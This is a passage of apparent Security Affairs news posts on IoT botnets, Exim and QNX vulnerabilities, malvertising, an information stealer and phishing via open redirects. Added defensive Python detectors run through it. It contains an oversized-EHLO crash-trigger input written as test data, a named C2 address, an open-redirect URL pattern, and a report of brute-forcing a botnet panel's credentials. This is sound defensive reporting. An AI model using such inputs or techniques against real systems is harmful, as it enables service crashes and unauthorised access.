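    # A packed or sstrip'ed bot often has no section header table at all;
    # treat that as stripped too, since there is nothing to read symbols from.
    has_shdrs = e_shoff != 0 and e_shnum != 0 and e_shentsize >= 8
    has_symtab = False
    for i in range(e_shnum if has_shdrs else 0):
        off = e_shoff + i * e_shentsize
        if off + 8 > len(data):
            break  # truncated table: stop rather than index past the buffer
        if struct.unpack_from(endian + "I", data, off + 4)[0] == SHT_SYMTAB:
            has_symtab = True
            break
    return {
        "class": "ELF32" if ei_class == 1 else "ELF64",
        "endian": "big" if ei_data == 2 else "little",
        "arch": E_MACHINE.get(e_machine, "unknown(0x%x)" % e_machine),
        "has_section_headers": has_shdrs,
        "stripped": not has_symtab,
        "md5": hashlib.md5(data).hexdigest(),
    }


def build_elf32(machine: int, big_endian: bool, section_types) -> bytes:
    """Constructed test image (not a real sample): a bare ELF32 header followed by
    one 40-byte section header per entry in section_types, with no code at all."""
    endian = ">" if big_endian else "<"
    ehsize, shentsize = 52, 40
    shnum = len(section_types)
    shoff = ehsize if shnum else 0
    ident = b"\x7fELF" + bytes([1, 2 if big_endian else 1, 1, 0]) + bytes(8)
    header = ident + struct.pack(endian + "HHIIIIIHHHHHH",
                                 2, machine, 1, 0, 0, shoff, 0,
                                 ehsize, 0, 0, shentsize, shnum, 0)
    shdrs = b"".join(struct.pack(endian + "II", 0, t) + bytes(32) for t in section_types)
    return header + shdrs


if __name__ == "__main__":
    samples = {
        "mips (unstripped)": build_elf32(0x08, True, [SHT_SYMTAB, 3]),
        "mpsl (stripped)":   build_elf32(0x08, False, [1, 3]),
        "arm (no shdrs)":    build_elf32(0x28, False, []),
    }
    for name, blob in samples.items():
        print(name, elf_triage(blob))
```

On real samples, read the file with `open(path, "rb").read()` and pass it to `elf_triage`; a binary that reports `has_section_headers: False` is usually packed or sstrip'ed, and program headers rather than sections are the only map you get.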

The binaries were found to be obfuscated. Further analysis showed that the Gucci bot connects to a remote IP on TCP port 5555 and transmits data over that channel. Digging deeper, we found that the remote host was running a custom telnet service on TCP port 5555 and exchanging commands with Gucci bots regularly. When a test connection was initiated to the remote IP on TCP port 5555 using a telnet client, the connection was accepted and credentials were requested.

Compromising C&C

Without authentication credentials it was not possible to access the service. Considering all scenarios, automated brute-force and account-cracking attempts were performed. The account credentials were successfully cracked, and a connection was initiated and accepted.

Figure 3 shows that the Gucci bot Command and Control panel was hijacked and privileged access was obtained.

Figure 3: Gucci C&C Bot Panel

The C&C listed the different types of Denial of Service (DoS) attacks supported by the Gucci bot. The supported attack types are:

  • HTTP null scan
  • UDP flood
  • Syn flood
  • ACK flood
  • UDP flood with less protocol options
  • GRE IP flood
  • Valve Source Engine specific flood

It was noticed that the Gucci bot was in the early stages of deployment. It was also observed that the botnet operator was monitoring all access connections to the Gucci C&C. As soon as the botnet operator realized that the C&C had been compromised, the TCP service was removed from the host, and the operator cleaned the directories and performed an additional set of operations to hide indicators and artefacts. The binaries were distributed from the location shown in Figure 4.

Figure 4: Gucci Bot – Source of Distribution

Inference

A new IOT bot, Gucci, has been discovered and analyzed. The botnet operator was found to be very proactive; the whole analysis and obtaining C&C access was like an arms race. The purpose of this research is to share the discovery details with the security research community so that the extracted intelligence can be used to fingerprint, detect and prevent Gucci bot infections. It is anticipated that the Gucci botnet is still active and targeting the European region. However, the attacks triggered by the Gucci bot could be broad-based or targeted depending on the operator’s requirements.

About the authors:

Aditya K Sood is a Cyber Security Expert who has been working in the field for more than 11 years. His work can be found at: https://adityaksood.com

Rohit Bansal is a Principal Security Researcher at SecNiche Security Labs

Pierluigi Paganini

(SecurityAffairs – malware, botnet)

The post Gucci IOT Bot Discovered Targeting European Region appeared first on Security Affairs.

Tridium Niagara framework affected by 2 flaws in BlackBerry QNX OS

Tridium’s Niagara product is affected by two vulnerabilities in BlackBerry’s QNX operating system for embedded devices.

The U.S. Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) is warning of two vulnerabilities in Tridium’s Niagara product that reside in BlackBerry’s QNX operating system for embedded devices.

The flaws could be exploited by a local user to escalate their privileges.

The Niagara Framework is a universal software infrastructure developed by Tridium that allows building-controls integrators and HVAC and mechanical contractors to build custom, web-enabled applications for accessing, automating and controlling smart devices in real time via the local network or over the Internet.


The Niagara framework is widely adopted, especially in the commercial facilities, government facilities, critical manufacturing and IT sectors.

The security flaws impact Niagara AX 3.8u4, 4.4u3 and 4.7u1.

The most severe vulnerability, tracked as CVE-2019-8998, is an information disclosure flaw related to the procfs service that can be exploited by a local attacker for privilege escalation.

The flaw was discovered by Johannes Eger and Fabian Ullrich of the Secure Mobile Networking Lab at TU Darmstadt in Germany and received a CVSS score of 7.8.

“This advisory addresses an information disclosure vulnerability leading to a potential local escalation of privilege in the default configuration of the procfs service (the /proc filesystem) on affected versions of the BlackBerry QNX Software Development Platform (QNX SDP) that could potentially allow a successful attacker to gain unauthorized access to a chosen process address space.” reads the advisory.

BlackBerry QNX confirmed that it is not aware of attacks exploiting the flaw in the wild.

The second vulnerability, tracked as CVE-2019-13528, is an improper authorization issue, it could allow a specific utility to gain read access to privileged files.

“A specific utility may allow an attacker to gain read access to privileged files in the Niagara AX 3.8u4 (JACE 3e, JACE 6e, JACE 7, JACE-8000), Niagara 4.4u3 (JACE 3e, JACE 6e, JACE 7, JACE-8000), and Niagara 4.7u1 (JACE-8000, Edge 10).” reads the advisory.

This flaw was reported by Francisco Tacliad and it received a CVSS score of 4.4.

Tridium has released updates that address these vulnerabilities and recommends users update to the versions identified below:

  • Niagara AX 3.8u4:
    • OS Dist: 2.7.402.2
    • NRE Config Dist: 3.8.401.1
  • Niagara 4.4u3:
    • OS Dist: 4.4.73.38.1
    • NRE Config Dist: 4.4.94.14.1
  • Niagara 4.7u1:
    • OS Dist (JACE-8000): 4.7.109.16.1
    • OS Dist (Edge 10): 4.7.109.18.1
    • NRE Config Dist: 4.7.110.32.1

Pierluigi Paganini

(SecurityAffairs – Tridium, IoT)

The post Tridium Niagara framework affected by 2 flaws in BlackBerry QNX OS appeared first on Security Affairs.

eGobbler ‘s malvertising campaign hijacked over 1 billion ad impressions

A recently observed malvertising campaign carried out by a threat group dubbed eGobbler hijacked roughly 1.16 billion ad impressions.

Researchers at Confiant observed a malvertising campaign, carried out by a threat actor dubbed eGobbler, that hijacked roughly 1.16 billion ad impressions to redirect victims to websites hosting malicious payloads.

The campaign was observed between August 1 and September 23.

The eGobbler group was first observed by security firm Confiant in April, when it was exploiting a security flaw in the Google Chrome browser to target millions of iOS users. At the time, Confiant experts estimated that more than 500 million malicious ads had been served to iOS users.

This time eGobbler hackers extended their attacks to Windows, Linux, and macOS desktop devices.

“Over the past 6 months, the threat group has leveraged obscure browser bugs in order to engineer bypasses for built-in browser mitigations against pop-ups and forced redirections.” reads the analysis published by Confiant.

“This blog post will provide overviews and proof of concepts for both browser exploits. The first exploit that we reported on April 11, 2019 impacts Chrome versions prior to 75 on iOS. The second, which we reported on Aug. 7 was fixed in iOS 13 / Safari 13.0.1 on Sept. 19, impacts WebKit based browsers.”

In the recent campaign, attackers used an exploit that targets WebKit-based browsers; the researchers observed redirections on WebKit browsers upon the ‘onkeydown’ event.

“The nature of the bug is that a cross-origin nested iframe is able to “autofocus” which bypasses the “allow-top-navigation-by-user-activation” sandbox directive on the parent frame.” continues the analysis. “With the inner frame automatically focused, the keydown event becomes a user activated navigation event, which renders the ad sandboxing entirely useless as a measure for forced redirect mitigation.”

Experts also discovered that the payload used in this campaign had specifically targeted some web applications using text areas and search forms in order to maximize the chances of hijacking these keypresses.

“eGobbler’s preference for desktop platforms during this period supports their latest WebKit exploit, as the ‘onkeydown’ event is less likely to spawn organically during mobile browsing,” states Confiant.

Experts reported the bug to both the Chrome and Apple security teams; the latter answered within the hour, while the former responded on August 9 that they were investigating.

On August 12, the Chrome team provided an update that a patch had been submitted to WebKit on August 9.

Apple addressed the issue in iOS 13 on September 19 and in Safari 13.0.1 on September 24.

The analysis published by the experts includes Indicators of Compromise for the recent campaign, including a list of content delivery networks (CDNs) used by the eGobbler threat actor to deliver the malicious payloads.

Pierluigi Paganini

(SecurityAffairs – eGobbler, hacking)

The post eGobbler ‘s malvertising campaign hijacked over 1 billion ad impressions appeared first on Security Affairs.

A new critical flaw in Exim exposes email servers to remote attacks

Exim maintainers released an urgent security update to address a critical security flaw that could allow a remote attacker to potentially execute malicious code on targeted servers.

Exim maintainers released an urgent security update, Exim version 4.92.3, to address a critical security vulnerability that could allow a remote attacker to crash or potentially execute malicious code on targeted email servers.

The flaw is a heap-based buffer overflow, tracked as CVE-2019-16928, that resides in the string_vformat function (string.c). An attacker could exploit the flaw using an extraordinarily long EHLO string to crash the Exim process that is receiving the message.

“There is a heap-based buffer overflow in string_vformat (string.c). The currently known exploit uses an extraordinarily long EHLO string to crash the Exim process that is receiving the message. While in this mode of operation Exim has already dropped its privileges, other paths to reach the vulnerable code may exist.” reads the security advisory published by the maintainers.

The CVE-2019-16928 flaw was reported by Jeremy Harris of the Exim Development Team; it affects all versions of the Exim email server software from 4.92 up to and including 4.92.2. The expert also released a PoC exploit for this vulnerability.
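Two checks a practitioner would want from the advisory text above, written here as an added example and not taken from the Exim project: (1) classifying an SMTP 220 banner against the affected range 4.92 to 4.92.2 and the fixed release 4.92.3, and (2) flagging EHLO/HELO command lines longer than the 512-octet limit that RFC 5321 sets for SMTP command lines, which is the shape of the known crash trigger. The transcript it runs over is constructed; the long EHLO is only illustrative and is not the maintainers’ proof-of-concept. Banners can be customised, so a negative result from the banner check is not proof that a server is patched.

```python
import re

# From the advisory quoted above: affected 4.92 up to and including 4.92.2, fixed in 4.92.3.
FIRST_AFFECTED = (4, 92)
FIXED_VERSION = (4, 92, 3)
# RFC 5321 section 4.5.3.1.4: an SMTP command line, CRLF included, is at most 512 octets.
SMTP_CMD_LINE_MAX = 512

# Constructed SMTP transcript (not a real capture): server banner, then client commands.
SAMPLE_SESSION = [
    "220 mx.example.test ESMTP Exim 4.92.2 Sun, 29 Sep 2019 10:00:00 +0000",
    "EHLO client.example.test",
    "EHLO " + "A" * 5000,   # illustrative oversized EHLO, not the published PoC
    "QUIT",
]


def parse_exim_version(banner):
    """Return the Exim version from a 220 banner as a tuple, or None if not Exim."""
    m = re.search(r"\bExim (\d+(?:\.\d+)*)", banner)
    if not m:
        return None
    return tuple(int(p) for p in m.group(1).split("."))


def banner_vulnerable_16928(banner):
    """True if the banner advertises a version in the CVE-2019-16928 range,
    False if outside it, None if the banner is not recognisably Exim."""
    version = parse_exim_version(banner)
    if version is None:
        return None
    return FIRST_AFFECTED <= version < FIXED_VERSION


def oversized_ehlo_lines(session_lines):
    """Return (line_number, length_in_bytes) for every EHLO/HELO command that
    exceeds the RFC 5321 command-line limit; such lines are worth alerting on
    regardless of the Exim version in the banner."""
    hits = []
    for n, line in enumerate(session_lines, 1):
        if re.match(r"(?i)^(EHLO|HELO)\b", line):
            size = len(line.encode("utf-8", "surrogateescape"))
            if size > SMTP_CMD_LINE_MAX:
                hits.append((n, size))
    return hits


if __name__ == "__main__":
    print("banner in affected range:", banner_vulnerable_16928(SAMPLE_SESSION[0]))
    print("oversized EHLO/HELO lines:", oversized_ehlo_lines(SAMPLE_SESSION))
```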

In early September, the Exim development team addressed another vulnerability in the popular mail server, tracked as CVE-2019-15846. The vulnerability could be exploited by local and remote attackers to execute arbitrary code with root privileges.

The vulnerability is a heap overflow that affects Exim mail servers up to and including version 4.92.1 that accept TLS connections. It affects builds using either GnuTLS or OpenSSL.

In mid-June, researchers observed several threat actors exploiting another flaw in the popular software, tracked as CVE-2019-10149, that resides in the deliver_message() function in /src/deliver.c and is caused by the improper validation of recipient addresses. The issue could lead to remote code execution with root privileges on the mail server. The CVE-2019-10149 flaw was addressed by the Exim development team with the release of version 4.92 in February.

The flaw is easily exploitable by a local attacker and, in certain non-default configurations, by a remote attacker; as experts had expected, it was actively exploited in the wild by various groups of hackers to compromise vulnerable servers.

The major distributions, including Ubuntu, Arch Linux, FreeBSD, Debian, and Fedora, have already released security updates.

Pierluigi Paganini

(SecurityAffairs – Mail Server, hacking)

The post A new critical flaw in Exim exposes email servers to remote attacks appeared first on Security Affairs.

Exclusive: MalwareMustDie analyzes a new IoT malware dubbed Linux/ AirDropBot

After 2 years of waiting, MalwareMustDie returns with an excellent page of malware analysis of a new IoT malware: Linux/AirDropBot.

Yes, I have to confess, it was hard to wait all this time, but the reward was worth it: unixfreaxjp is back, with a new, great page of reverse engineering published on the MalwareMustDie blog: “MMD-0064-2019 – Linux/AirDropBot”.

And this is not only Odisseus’s opinion, just because I can be addressed as a member of the MalwareMustDie crew: this last post IS a masterpiece technically speaking, because here unixfreaxjp reveals some unique and undocumented best practices for reversing Linux malware binaries (Intel and non-Intel platforms), providing every whitehat reverser with many references and how-tos for dealing with ELF Linux malware, mixing theory and practice and showing how incredibly useful Radare r2 and the Tsurugi distribution are.

I don’t know if it is because I have asked my friend unixfreaxjp many times to publicly show how Radare r2 can be used with great results, but after this post we can definitively state that, once again, Radare r2 has nothing to envy of the best commercial tools used in the many reverse engineering tutorials available on YouTube.

In fact this time we have not a “simple” blog post, but a rich, strong and powerful technical lesson on how stripped binaries can be reversed even if they are “indeed” stripped.

Unixfreaxjp leads the reader step by step to understand how malware code is built, which methods, secrets and hidden techniques the coders use to hide and encrypt the C2 address as much as possible, how the operative commands coming from the C2 are parsed, and how almost everything can be reconstructed to get the source code back from any stripped binary.

The beginning of the story: another IoT malware in the wild?

But let’s go back to the beginning of the story, when my very good friend @0xrb found in his honeypot this new “Mirai-like” Linux malware, which has important differences from the Mirai implementation. He immediately understood that there was something strange in this new “Mirai variant” and proposed the sample to the MalwareMustDie team: here is his early tweet.

It is also possible to take a look at the logs of the malware that @0xrb published on Pastebin: a lot of information about the running phase is made available there. One item, for example, is the C2 server.

The C2 of the botnet was: 147.135.174.119

As unixfreaxjp states in his post, @0xrb successfully submitted the sample to the MalwareMustDie team for deeper analysis, and the result is another great page of Linux malware reversing that every malware analyst should read and re-read.

We will skip over the technical analysis here, because the MalwareMustDie post is extremely clear and explanatory in every single part of its analysis.

Coming to the core topic: IoT botnet threat and their ecosystem

New Linux malware aimed at the Internet of Things is appearing a lot and, as previously mentioned, it is driven by the money scheme that fuels the botnet ecosystem, as previously covered on Security Affairs; this is still the main reason why freshly coded malware in this sector keeps coming up.

First spotted on the Internet on August 3rd, 2019, Linux/AirDropBot is a malware built to target many embedded Linux platforms, meant to propagate its botnet across several platforms commonly used in IoT devices. It is still not in the final stage of development, judging from some unimplemented functions, but the adversary’s mission is clear: to infect as many Linux IoT devices as possible and get rid of competitors. It was first detected as Mirai- or Gafgyt-like in the first series of samples, and this may have led researchers in Linux malware to ignore its initial existence.

Many processors are targeted by the malware, but when CPUs like ARC Cores, Renesas SH, Motorola m68000, Altera Nios II, Tensilica Xtensa and Xilinx MicroBlaze are targeted along with the other generic cross-compiled CPUs (MIPS/ARM/PPC/SPARC/Intel), the herder means serious business in “pwning” every reachable IoT device. The binaries fall into two categories: those that act as bots and are meant to infect small devices, and, for bigger systems, those carrying a worm-like vulnerability scanner aimed at CGI pages on routers (this version targets HTTP port 8080 on a specific product’s CGI file), which can propagate in a worm-like fashion alongside telnet scanning (attacking TCP port 23 or 2323).

The analysis in the recent MalwareMustDie post “MMD-0064-2019 – Linux/AirDropBot” shows the latest binary sets used by the adversaries behind this botnet. The scanner function exploiting a certain router’s vulnerability is hardcoded, and this threat also aimed at other exploits in older sample deliveries. The overall idea is a known one, but the code is newly made.
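The telnet (23/2323) and HTTP 8080 scanning described above leaves a simple footprint in flow or firewall logs: one source touching many distinct hosts on those ports in a short span. The following Python example, added here and not part of the MalwareMustDie analysis, applies that horizontal-scan heuristic to a constructed set of flow records; the “timestamp src dst port proto” line format, the addresses and the threshold of four distinct hosts are assumptions for the example, and the timestamps are constructed values.

```python
from collections import defaultdict

# Ports the analysis names: telnet scanning on 23/2323 and the router CGI
# exploit on HTTP 8080.
SCAN_PORTS = {23, 2323, 8080}

# Constructed flow records (not real logs): "epoch src_ip dst_ip dst_port proto".
SAMPLE_FLOWS = [
    "1564790400 203.0.113.7 192.0.2.10 23 TCP",
    "1564790401 203.0.113.7 192.0.2.11 23 TCP",
    "1564790401 203.0.113.7 192.0.2.12 2323 TCP",
    "1564790402 203.0.113.7 192.0.2.13 23 TCP",
    "1564790402 203.0.113.7 192.0.2.14 23 TCP",
    "1564790403 203.0.113.7 192.0.2.15 8080 TCP",
    "1564790403 203.0.113.7 192.0.2.16 8080 TCP",
    "1564790404 203.0.113.7 192.0.2.10 23 TCP",    # repeat target: must not double count
    "1564790405 198.51.100.9 192.0.2.20 8080 TCP",
    "1564790406 198.51.100.9 192.0.2.20 8080 TCP",
    "1564790407 198.51.100.9 192.0.2.21 443 TCP",  # not a scan port
    "1564790408 198.51.100.9 192.0.2.22 23 UDP",   # not TCP: ignored
]


def parse_flow(line):
    """Split one constructed flow record into typed fields."""
    ts, src, dst, port, proto = line.split()
    return int(ts), src, dst, int(port), proto.upper()


def find_scanners(lines, min_targets=4):
    """Return {src: {"hosts": n, "ports": [...]}} for every source that connected
    over TCP to at least min_targets distinct hosts on SCAN_PORTS. Distinct hosts,
    not connection count, is what separates a scanner from a chatty client."""
    hosts_by_src = defaultdict(set)
    ports_by_src = defaultdict(set)
    for line in lines:
        _, src, dst, port, proto = parse_flow(line)
        if proto != "TCP" or port not in SCAN_PORTS:
            continue
        hosts_by_src[src].add(dst)
        ports_by_src[src].add(port)
    return {
        src: {"hosts": len(hosts), "ports": sorted(ports_by_src[src])}
        for src, hosts in hosts_by_src.items()
        if len(hosts) >= min_targets
    }


if __name__ == "__main__":
    for src, info in find_scanners(SAMPLE_FLOWS).items():
        print(f"{src}: {info['hosts']} distinct hosts on ports {info['ports']}")
```

In production the threshold should be applied per time window (a sliding minute, say) rather than over an entire log, and the same logic can be pointed at NetFlow or conntrack exports once `parse_flow` is adapted to their field order.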

Final considerations on the behavior to take in order to face this threat.

Internet of Things security quality is improving, and governments all over the globe are seriously handling this: for example, in the US the “Security Feature Recommendations for IoT Devices” by NIST is a good recommended plan, in the UK a voluntary code of practice (CoP) has been published to help manufacturers boost the security of the internet-connected devices that make up the Internet of Things (IoT), and in Japan the Project to Survey IoT Devices and to Alert Users has been started. Yet there are a lot of products to handle, and their vulnerabilities are being researched at the same time by adversaries. This is why the IoT threat is still causing a lot of issues: day by day new exploits come up, old issues are re-used, and unpatched segments are revealed and targeted.

Are we on the wrong track then? I don’t think so. Yes, the process takes time, and what we can do is keep improving detection of new threats, containment, and response as prevention to strengthen the defense scheme for the platform, along with the parallel legal work on stopping adversaries. If we commit to keep doing these steps, the adversaries will find more demerits than merits in hammering us with their botnets.

About the Author: 

Odisseus – Independent Security Researcher involved in Italy and worldwide in topics related to hacking, penetration testing and development.

Pierluigi Paganini

(SecurityAffairs – AirDropBot, malware)

The post Exclusive: MalwareMustDie analyzes a new IoT malware dubbed Linux/ AirDropBot appeared first on Security Affairs.

Iran’s oil minister orders ‘Full Alert’ for oil sector against attacks

Iran ‘s oil minister on Sunday ordered representatives of the energy sector to be on ‘full alert’ to the threat of “physical and cyber” attacks.

Iran’s oil minister, Bijan Namdar Zanganeh, ordered companies operating in the energy sector to be on ‘full alert’ to the threat of “physical and cyber” attacks.

“It is necessary for all companies and installations of the oil industry to be on full alert against physical and cyber threats,” reads a statement published on the oil ministry’s Shana website.

Iran fears retaliation from Western countries, which accuse it of carrying out physical and cyber attacks against their infrastructure and against countries in the Middle East.

Iran’s oil ministry said that the government in Washington has launched a “full-scale economic war” against the Islamic republic.

In mid-September, drone attacks hit two major oil facilities run by the state-owned company Aramco in Saudi Arabia, one of them the Abqaiq site.

Iran-backed Houthi rebels in Yemen claimed responsibility for the attacks on the Abqaiq plant, according to a spokesman for the group in Yemen, it had deployed 10 drones in the attacks.

The group is threatening Saudi Arabia with further attacks. The Iran-aligned Houthi rebel movement has been fighting the Yemeni government and a coalition of regional countries led by Saudi Arabia since 2015, when President Abdrabbuh Mansour Hadi was kicked out of Sanaa by the Houthis.

Secretary of State Mike Pompeo blamed Iran for coordinating the attacks, adding that we are facing an unprecedented attack on the world’s energy supply.

Riyadh, Berlin, London, and Paris also blame Teheran for attacks that caused severe damages to the Saudi oil sector on September 14.

Iran denied any involvement in the attacks. Immediately after the attacks, US President Donald Trump announced that his country was preparing a response. President Trump opted for an intensification of economic sanctions against Teheran.

Military and intelligence experts believe that a western coalition, driven by the US, could carry out a series of cyber attacks against Iranian critical infrastructure. A few days after the drone attacks, some western media reported destructive cyber attacks against infrastructure in the Iranian oil sector, but Iran denied it.

“Contrary to Western media claims, investigations done today show no successful cyber attack was made on the country’s oil installations and other crucial infrastructure,” reads a statement published by the government’s cyber security office.

Despite the statement, security experts believe that a cyber offensive against Iranian infrastructure is ongoing.

Pierluigi Paganini

(SecurityAffairs – Iran, oil sector)

The post Iran’s oil minister orders ‘Full Alert’ for oil sector against attacks appeared first on Security Affairs.

Arcane Stealer V, a threat for lower-skilled adversaries that scares experts

Experts recently analyzed an information-stealing malware tracked as Arcane Stealer V that is very cheap and easy to buy in the Dark Web.

In July 2019, researchers at Fidelis Threat Research Team (TRT) analyzed a sample of Arcane Stealer V, a .net information-stealing malware that is easy to acquire in the dark web. The author of the malware is selling it on his own website and on the Lolzteam site on the Dark Web, the researchers also found cracked versions on multiple community discussion and file-sharing platforms.

The malware is quite cheap, it goes for just $9 on the Dark Web, and could be also used by lower-skilled adversaries. Due to the low-cost of the malware, experts believe that its popularity could rapidly increase.

“The Arcane Stealer is a .net information stealer. The malware is available as a graphical user interface (GUI) or users can purchase the code, making it easier for actors with novice skills to employ. It sells for 699 Rubles or approximately 9 US dollars.” reads the post published by the researchers. “There is also support available on Telegram along with other “helpful” bots.”

In early August, the researchers were able to track multiple instant messenger and social media accounts associated with a Russian-language actor that might be the author of the malware.

The malware is able to collect various data from victims, including operating system and browser information, cryptocurrency wallets, instant-messaging sessions from Telegram, Discord, and Pidgin, and data (i.e. passwords, cookies and forms) from several browsers, including Chrome, Opera, Kometa, Orbitum, Comodo, Amigo, Torch and Yandex.

Arcane Stealer V could also be used to steal documents, collect Steam gaming community data, log detected virtual machine IPs, and steal data from FileZilla servers.

The threat actor behind the Arcane Stealer V also provides dashboards and statistics to show crooks that buy the malware the potential earnings.


When the malware runs, it takes a screenshot and then it creates a text log file of what was collected.

“When run, the file collects data, takes a screenshot and then creates a text log file of what was collected. It stores all of the information in a folder in %appdata%/local/{hwid}/.” continues the post. “It uses the assigned hardware ID that the malware generates as the folder name and zip folder name.”

Then the malware sends the zipped file to the C2 server.

The researchers identified multiple Telegram and Twitter accounts with the handles “@arcanee_bot,” “@es3n1n” and “@SakariHack,” which were used to discuss how to build and distribute the malware. These accounts were all associated with the same Russian-language actor, a 21-year-old man who says he suffers from a form of epilepsy.

“The actor associated with the malware appears to be a native Russian speaker, however it is unclear if the actor is currently located in Russia,” continues the analysis. “The actor’s information-stealer does not appear to limit potential targets. Analysts have observed the capability of Russian sites to be targeted in the malware.”

Experts pointed out that the malware unlike other threats doesn’t discriminate geo-location of the victims and could be used against any target.

“Based off current observation and analysis, Arcane Stealer and its developer(s) appear to be low-level threats.” conclude the experts.

“Due to the lack of traversal, propagation, or destructive capabilities at the time of analysis, it is assessed with moderate confidence that this malware may not become popular with high-value and highly capable actors. However, because users can buy the source code, it is possible that we may see other threat actors reusing the malware and creating their own variant of Arcane V, as has been done with other popular malware families, like njRAT.”

Pierluigi Paganini

(SecurityAffairs – Arcane Stealer V, malware)

The post Arcane Stealer V, a threat for lower-skilled adversaries that scares experts appeared first on Security Affairs.

Microsoft will add new file types to the list of blocked ones in Outlook on the Web

Microsoft announced last week it is going to expand the list of file extensions that are blocked in Outlook on the web.

Microsoft announced that it will immediately block additional file extensions for Outlook on the web users, making it impossible for them to download these types of attachments.

Microsoft pointed out that the newly blocked file types are rarely used, this means that most organizations will face no problems with the change.

The list of file types that will be blocked by Microsoft includes ones used by popular programming languages such as “.py”, “.pyc”, “.pyo”, “.pyw”, “.pyz” and “.pyzw” (used by Python); “.ps1”, “.ps1xml”, “.ps2”, “.ps2xml”, “.psc1”, “.psc2”, “.psd1”, “.psdm1”, “.cdxml” and “.pssc” (used by PowerShell); and “.jar” and “.jnlp” (used by Java).

Microsoft announced it will block also “.appcontent-ms“, “.settingcontent-ms“, “.cnt“, “.hpj“, “.website”, “.webpnp“, “.mcf“, “.printerexport“, “.pl“, “.theme”, “.vbp“, “.xbap“, “.xll“, “.xnk“, “.msu“, “.diagcab” and “.grp“.

Other file types that will be blocked by the tech giant are the ones having the “.appref-ms” extension used by Windows ClickOnce, the “.udl” extension used by Microsoft Data Access Components (MDAC), the “.wsb” extension used by Windows sandbox, and the “.cer“, “.crt” and “.der” extensions associated with digital certificates.

“The following extensions are used by various applications.” reads the post published by Microsoft. “While the associated vulnerabilities have been patched (for years, in most cases), they are being blocked for the benefit of organizations that might still have older versions of the application software in use:

“.appcontent-ms”, “.settingcontent-ms”, “.cnt”, “.hpj”, “.website”, “.webpnp”, “.mcf”, “.printerexport”, “.pl”, “.theme”, “.vbp”, “.xbap”, “.xll”, “.xnk”, “.msu”, “.diagcab”, “.grp””

In case organizations have to allow for the use of a particular file type, admins could add specific extensions to the AllowedFileTypes property of users’ OwaMailboxPolicy objects.

“If you want a particular file type to be allowed, you can add that file type to the AllowedFileTypes property of your users’ OwaMailboxPolicy objects.” continues the post. “To add a file extension to the AllowedFileTypes list:

$policy = Get-OwaMailboxPolicy [policy name]
$allowedFileTypes = $policy.AllowedFileTypes
$allowedFileTypes.Add(".foo")
Set-OwaMailboxPolicy $policy -AllowedFileTypes $allowedFileTypes

“Security of our customer’s data is our utmost priority, and we hope our customers will understand and appreciate this change. Change can be disruptive, so we hope the information here explains what we’re doing and why,” Microsoft concludes.

Pierluigi Paganini

(SecurityAffairs – Outlook, hacking)

The post Microsoft will add new file types to the list of blocked ones in Outlook on the Web appeared first on Security Affairs.

Phishers continue to abuse Adobe and Google Open Redirects


Experts reported that phishing campaigns are leveraging Google and Adobe open redirects to bypass spam filters and redirect users to malicious sites.

Phishers are abusing Google and Adobe open redirects to bypass spam filters and redirect users to malicious sites.

Crooks abuse Google and Adobe services to create URLs that point to malicious websites but still bypass security filters, because they appear to be legitimate URLs from trusted IT giants.

“Open redirectors take you from a Google URL to another website chosen by whoever constructed the link. Some members of the security community argue that the redirectors aid phishing, because users may be inclined to trust the mouse hover tooltip on a link and then fail to examine the address bar once the navigation takes place.” reads the post published by Google.

“Our take on this is that tooltips are not a reliable security indicator, and can be tampered with in many ways; so, we invest in technologies to detect and alert users about phishing and abuse, but we generally hold that a small number of properly monitored redirectors offers fairly clear benefits and poses very little practical risk.”

An example of Google open redirect is https://www.google.com/url?q=[url] that could be abused by attackers.
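To make the redirector pattern concrete, here is an added Python example (not code from Google, Adobe or BleepingComputer) that unwraps the Google `/url?q=` shape shown above without fetching anything, follows nested wrappers, and compares the final host against an allow-list so the link is judged by where it lands rather than by the trusted domain it starts on. The Adobe service is not modelled because the page does not give its URL shape; the redirector table is written so that a confirmed (host, path, parameter) triple can be added. The sample links and the allow-list are constructed.

```python
from urllib.parse import urlsplit, parse_qs, quote

# Redirector shapes this post names: https://www.google.com/url?q=<target>.
# Key: (host, path) -> name of the query parameter carrying the destination.
# Add the Adobe redirector here once its shape has been confirmed (assumption).
REDIRECTORS = {
    ("www.google.com", "/url"): "q",
    ("google.com", "/url"): "q",
}


def unwrap_redirect(url, max_hops=5):
    """Peel known open-redirect wrappers off a URL without touching the network.
    Returns (final_url, hops); nested wrappers are followed up to max_hops."""
    current, hops = url, 0
    while hops < max_hops:
        parts = urlsplit(current)
        param = REDIRECTORS.get((parts.netloc.lower(), parts.path))
        if param is None:
            break
        values = parse_qs(parts.query).get(param)  # parse_qs percent-decodes once
        if not values:
            break
        current, hops = values[0], hops + 1
    return current, hops


def classify_link(url, trusted_hosts):
    """Return ("ok"|"suspicious", final_host). A link is suspicious when it was
    wrapped by a redirector and lands on a host outside the allow-list, or on
    no parseable host at all (scheme-less or malformed target)."""
    final, hops = unwrap_redirect(url)
    host = urlsplit(final).netloc.lower()
    if hops == 0:
        return "ok", host
    if not host or host not in trusted_hosts:
        return "suspicious", host
    return "ok", host


# Constructed sample links (not taken from a real campaign).
PHISH_TARGET = "https://login.example-phish.test/owa"
WRAPPED_ONCE = "https://www.google.com/url?q=" + quote(PHISH_TARGET, safe="") + "&sa=D"
WRAPPED_TWICE = "https://www.google.com/url?q=" + quote(WRAPPED_ONCE, safe="")
DIRECT_SEARCH = "https://www.google.com/search?q=exim"

if __name__ == "__main__":
    allow = {"www.google.com", "mail.example.test"}
    for link in (WRAPPED_ONCE, WRAPPED_TWICE, DIRECT_SEARCH):
        print(classify_link(link, allow), "<-", link[:70])
```

Run over the URLs extracted from a mail body, this turns “it links to google.com” into “it links to google.com and then to login.example-phish.test”, which is the signal a mail filter or an analyst actually needs.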

“Phishing campaigns commonly utilize open redirects from well known companies as they feel users will be more likely to click on a link if it belongs to Google or Adobe.” reported BleepingComputer.

Below is an example of a phishing message that uses a Google open redirect pointing to a fake login page.

In a similar way, attackers could abuse the Adobe redirect service in phishing campaigns.

Experts suggest administrators and users remain vigilant on open redirects.

Pierluigi Paganini

(SecurityAffairs – google open redirects, phishing)


The post Phishers continue to abuse Adobe and Google Open Redirects appeared first on Security Affairs.

Security Affairs newsletter Round 233

A new round of the weekly newsletter arrived! The best news of the week with Security Affairs



Hi folks, let me inform you that I suspended the newsletter service; anyway, I’ll continue to provide you with a list of published posts every week through the blog.

Once again thank you!

0patch will provide micropatches for Windows 7 and Server 2008 after EoS
Critical flaws affect Jira Service Desk and Jira Service Desk Data Center
